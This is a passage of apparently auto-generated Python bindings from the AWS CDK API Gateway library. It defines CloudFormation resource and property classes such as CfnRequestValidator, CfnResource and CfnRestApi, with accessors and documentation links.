:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Model.ApiId``.
:param name: ``AWS::ApiGatewayV2::Model.Name``.
:param schema: ``AWS::ApiGatewayV2::Model.Schema``.
:param content_type: ``AWS::ApiGatewayV2::Model.ContentType``.
:param description: ``AWS::ApiGatewayV2::Model.Description``.
"""
props = CfnModelV2Props(api_id=api_id, name=name, schema=schema, content_type=content_type, description=description)
jsii.create(CfnModelV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Model.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGatewayV2::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="schema")
def schema(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-schema
"""
return jsii.get(self, "schema")
@schema.setter
def schema(self, value: typing.Any):
return jsii.set(self, "schema", value)
@property
@jsii.member(jsii_name="contentType")
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-contenttype
"""
return jsii.get(self, "contentType")
@content_type.setter
def content_type(self, value: typing.Optional[str]):
return jsii.set(self, "contentType", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnModelV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'name': 'name', 'schema': 'schema', 'content_type': 'contentType', 'description': 'description'})
class CfnModelV2Props():
def __init__(self, *, api_id: str, name: str, schema: typing.Any, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Model``.
:param api_id: ``AWS::ApiGatewayV2::Model.ApiId``.
:param name: ``AWS::ApiGatewayV2::Model.Name``.
:param schema: ``AWS::ApiGatewayV2::Model.Schema``.
:param content_type: ``AWS::ApiGatewayV2::Model.ContentType``.
:param description: ``AWS::ApiGatewayV2::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html
"""
self._values = {
'api_id': api_id,
'name': name,
'schema': schema,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Model.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-apiid
"""
return self._values.get('api_id')
@property
def name(self) -> str:
"""``AWS::ApiGatewayV2::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-name
"""
return self._values.get('name')
@property
def schema(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-schema
"""
return self._values.get('schema')
@property
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-contenttype
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-description
"""
return self._values.get('description')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnModelV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRequestValidator(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRequestValidator"):
"""A CloudFormation ``AWS::ApiGateway::RequestValidator``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::RequestValidator
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, name: typing.Optional[str]=None, validate_request_body: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, validate_request_parameters: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None) -> None:
"""Create a new ``AWS::ApiGateway::RequestValidator``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::RequestValidator.RestApiId``.
:param name: ``AWS::ApiGateway::RequestValidator.Name``.
:param validate_request_body: ``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
:param validate_request_parameters: ``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
"""
props = CfnRequestValidatorProps(rest_api_id=rest_api_id, name=name, validate_request_body=validate_request_body, validate_request_parameters=validate_request_parameters)
jsii.create(CfnRequestValidator, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::RequestValidator.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RequestValidator.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="validateRequestBody")
def validate_request_body(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestbody
"""
return jsii.get(self, "validateRequestBody")
@validate_request_body.setter
def validate_request_body(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "validateRequestBody", value)
@property
@jsii.member(jsii_name="validateRequestParameters")
def validate_request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestparameters
"""
return jsii.get(self, "validateRequestParameters")
@validate_request_parameters.setter
def validate_request_parameters(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "validateRequestParameters", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRequestValidatorProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'name': 'name', 'validate_request_body': 'validateRequestBody', 'validate_request_parameters': 'validateRequestParameters'})
class CfnRequestValidatorProps():
def __init__(self, *, rest_api_id: str, name: typing.Optional[str]=None, validate_request_body: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, validate_request_parameters: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""Properties for defining a ``AWS::ApiGateway::RequestValidator``.
:param rest_api_id: ``AWS::ApiGateway::RequestValidator.RestApiId``.
:param name: ``AWS::ApiGateway::RequestValidator.Name``.
:param validate_request_body: ``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
:param validate_request_parameters: ``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if name is not None: self._values["name"] = name
if validate_request_body is not None: self._values["validate_request_body"] = validate_request_body
if validate_request_parameters is not None: self._values["validate_request_parameters"] = validate_request_parameters
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::RequestValidator.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-restapiid
"""
return self._values.get('rest_api_id')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RequestValidator.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-name
"""
return self._values.get('name')
@property
def validate_request_body(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestbody
"""
return self._values.get('validate_request_body')
@property
def validate_request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestparameters
"""
return self._values.get('validate_request_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRequestValidatorProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnResource(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnResource"):
"""A CloudFormation ``AWS::ApiGateway::Resource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Resource
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, parent_id: str, path_part: str, rest_api_id: str) -> None:
"""Create a new ``AWS::ApiGateway::Resource``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param parent_id: ``AWS::ApiGateway::Resource.ParentId``.
:param path_part: ``AWS::ApiGateway::Resource.PathPart``.
:param rest_api_id: ``AWS::ApiGateway::Resource.RestApiId``.
"""
props = CfnResourceProps(parent_id=parent_id, path_part=path_part, rest_api_id=rest_api_id)
jsii.create(CfnResource, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="parentId")
def parent_id(self) -> str:
"""``AWS::ApiGateway::Resource.ParentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-parentid
"""
return jsii.get(self, "parentId")
@parent_id.setter
def parent_id(self, value: str):
return jsii.set(self, "parentId", value)
@property
@jsii.member(jsii_name="pathPart")
def path_part(self) -> str:
"""``AWS::ApiGateway::Resource.PathPart``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-pathpart
"""
return jsii.get(self, "pathPart")
@path_part.setter
def path_part(self, value: str):
return jsii.set(self, "pathPart", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Resource.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnResourceProps", jsii_struct_bases=[], name_mapping={'parent_id': 'parentId', 'path_part': 'pathPart', 'rest_api_id': 'restApiId'})
class CfnResourceProps():
def __init__(self, *, parent_id: str, path_part: str, rest_api_id: str):
"""Properties for defining a ``AWS::ApiGateway::Resource``.
:param parent_id: ``AWS::ApiGateway::Resource.ParentId``.
:param path_part: ``AWS::ApiGateway::Resource.PathPart``.
:param rest_api_id: ``AWS::ApiGateway::Resource.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html
"""
self._values = {
'parent_id': parent_id,
'path_part': path_part,
'rest_api_id': rest_api_id,
}
@property
def parent_id(self) -> str:
"""``AWS::ApiGateway::Resource.ParentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-parentid
"""
return self._values.get('parent_id')
@property
def path_part(self) -> str:
"""``AWS::ApiGateway::Resource.PathPart``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-pathpart
"""
return self._values.get('path_part')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Resource.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-restapiid
"""
return self._values.get('rest_api_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnResourceProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRestApi(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRestApi"):
"""A CloudFormation ``AWS::ApiGateway::RestApi``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::RestApi
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key_source_type: typing.Optional[str]=None, binary_media_types: typing.Optional[typing.List[str]]=None, body: typing.Any=None, body_s3_location: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["S3LocationProperty"]]]=None, clone_from: typing.Optional[str]=None, description: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]=None, fail_on_warnings: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, name: typing.Optional[str]=None, parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, policy: typing.Any=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None) -> None:
"""Create a new ``AWS::ApiGateway::RestApi``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_key_source_type: ``AWS::ApiGateway::RestApi.ApiKeySourceType``.
:param binary_media_types: ``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
:param body: ``AWS::ApiGateway::RestApi.Body``.
:param body_s3_location: ``AWS::ApiGateway::RestApi.BodyS3Location``.
:param clone_from: ``AWS::ApiGateway::RestApi.CloneFrom``.
:param description: ``AWS::ApiGateway::RestApi.Description``.
:param endpoint_configuration: ``AWS::ApiGateway::RestApi.EndpointConfiguration``.
:param fail_on_warnings: ``AWS::ApiGateway::RestApi.FailOnWarnings``.
:param minimum_compression_size: ``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
:param name: ``AWS::ApiGateway::RestApi.Name``.
:param parameters: ``AWS::ApiGateway::RestApi.Parameters``.
:param policy: ``AWS::ApiGateway::RestApi.Policy``.
:param tags: ``AWS::ApiGateway::RestApi.Tags``.
"""
props = CfnRestApiProps(api_key_source_type=api_key_source_type, binary_media_types=binary_media_types, body=body, body_s3_location=body_s3_location, clone_from=clone_from, description=description, endpoint_configuration=endpoint_configuration, fail_on_warnings=fail_on_warnings, minimum_compression_size=minimum_compression_size, name=name, parameters=parameters, policy=policy, tags=tags)
jsii.create(CfnRestApi, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="attrRootResourceId")
def attr_root_resource_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RootResourceId
"""
return jsii.get(self, "attrRootResourceId")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::RestApi.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="body")
def body(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Body``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-body
"""
return jsii.get(self, "body")
@body.setter
def body(self, value: typing.Any):
return jsii.set(self, "body", value)
@property
@jsii.member(jsii_name="policy")
def policy(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Policy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-policy
"""
return jsii.get(self, "policy")
@policy.setter
def policy(self, value: typing.Any):
return jsii.set(self, "policy", value)
@property
@jsii.member(jsii_name="apiKeySourceType")
def api_key_source_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.ApiKeySourceType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-apikeysourcetype
"""
return jsii.get(self, "apiKeySourceType")
@api_key_source_type.setter
def api_key_source_type(self, value: typing.Optional[str]):
return jsii.set(self, "apiKeySourceType", value)
@property
@jsii.member(jsii_name="binaryMediaTypes")
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-binarymediatypes
"""
return jsii.get(self, "binaryMediaTypes")
@binary_media_types.setter
def binary_media_types(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "binaryMediaTypes", value)
@property
@jsii.member(jsii_name="bodyS3Location")
def body_s3_location(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["S3LocationProperty"]]]:
"""``AWS::ApiGateway::RestApi.BodyS3Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-bodys3location
"""
return jsii.get(self, "bodyS3Location")
@body_s3_location.setter
def body_s3_location(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["S3LocationProperty"]]]):
return jsii.set(self, "bodyS3Location", value)
@property
@jsii.member(jsii_name="cloneFrom")
def clone_from(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.CloneFrom``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-clonefrom
"""
return jsii.get(self, "cloneFrom")
@clone_from.setter
def clone_from(self, value: typing.Optional[str]):
return jsii.set(self, "cloneFrom", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="endpointConfiguration")
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::RestApi.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-endpointconfiguration
"""
return jsii.get(self, "endpointConfiguration")
@endpoint_configuration.setter
def endpoint_configuration(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]):
return jsii.set(self, "endpointConfiguration", value)
@property
@jsii.member(jsii_name="failOnWarnings")
def fail_on_warnings(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RestApi.FailOnWarnings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-failonwarnings
"""
return jsii.get(self, "failOnWarnings")
@fail_on_warnings.setter
def fail_on_warnings(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "failOnWarnings", value)
@property
@jsii.member(jsii_name="minimumCompressionSize")
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-minimumcompressionsize
"""
return jsii.get(self, "minimumCompressionSize")
@minimum_compression_size.setter
def minimum_compression_size(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "minimumCompressionSize", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="parameters")
def parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::RestApi.Parameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-parameters
"""
return jsii.get(self, "parameters")
@parameters.setter
def parameters(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "parameters", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRestApi.EndpointConfigurationProperty", jsii_struct_bases=[], name_mapping={'types': 'types'})
class EndpointConfigurationProperty():
def __init__(self, *, types: typing.Optional[typing.List[str]]=None):
"""
:param types: ``CfnRestApi.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-endpointconfiguration.html
"""
self._values = {
}
if types is not None: self._values["types"] = types
@property
def types(self) -> typing.Optional[typing.List[str]]:
"""``CfnRestApi.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-endpointconfiguration.html#cfn-apigateway-restapi-endpointconfiguration-types
"""
return self._values.get('types')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'EndpointConfigurationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
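# Illustrative sketch: the endpoint types documented for this CloudFormation
# property are "EDGE", "REGIONAL" and "PRIVATE".
#
#   CfnRestApi.EndpointConfigurationProperty(types=["PRIVATE"])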
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRestApi.S3LocationProperty", jsii_struct_bases=[], name_mapping={'bucket': 'bucket', 'e_tag': 'eTag', 'key': 'key', 'version': 'version'})
class S3LocationProperty():
def __init__(self, *, bucket: typing.Optional[str]=None, e_tag: typing.Optional[str]=None, key: typing.Optional[str]=None, version: typing.Optional[str]=None):
"""
:param bucket: ``CfnRestApi.S3LocationProperty.Bucket``.
:param e_tag: ``CfnRestApi.S3LocationProperty.ETag``.
:param key: ``CfnRestApi.S3LocationProperty.Key``.
:param version: ``CfnRestApi.S3LocationProperty.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html
